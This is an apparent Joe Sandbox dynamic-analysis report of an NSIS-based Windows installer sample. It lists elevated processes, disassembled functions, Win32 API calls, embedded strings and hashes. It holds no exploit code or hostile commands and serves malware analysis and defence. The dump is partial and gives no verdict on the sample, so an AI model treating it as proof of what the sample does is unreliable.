MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:09:57
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x310000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

Error launching installer, xrefs: 00403AA9
~nsu.tmp, xrefs: 00403B23
NCRC, xrefs: 004039A8
SeShutdownPrivilege, xrefs: 00403C42
_?=, xrefs: 00403A90
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47
/D=, xrefs: 004039D2

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Aborting: "%s", xrefs: 0040161D
Rename on reboot: %s, xrefs: 00401943
Rename: %s, xrefs: 004018F8
Rename failed: %s, xrefs: 0040194B
BringToFront, xrefs: 004016BD
detailprint: %s, xrefs: 00401679
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes failed., xrefs: 004017A1
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

RichEdit, xrefs: 00405BF0
.exe, xrefs: 00405A69
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd32, xrefs: 00405BD4
.DEFAULT\Control Panel\International, xrefs: 004059C5
_Nb, xrefs: 00405AFD
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
"F, xrefs: 00405A4B
F, xrefs: 00405A22
@jG, xrefs: 00405AF2
RichEd20, xrefs: 00405BC9

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,SpecialtiesThrownOptics,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,SpecialtiesThrownOptics,SpecialtiesThrownOptics,00000000,00000000,SpecialtiesThrownOptics,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424CAD,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user retry, xrefs: 00401B40
File: wrote %d to "%s", xrefs: 00401BD0
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error creating "%s", xrefs: 00401AF0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user cancel, xrefs: 00401B93
SpecialtiesThrownOptics, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SpecialtiesThrownOptics
API String ID: 4286501637-4185024266
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
Inst, xrefs: 00403698
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Null, xrefs: 004036AA
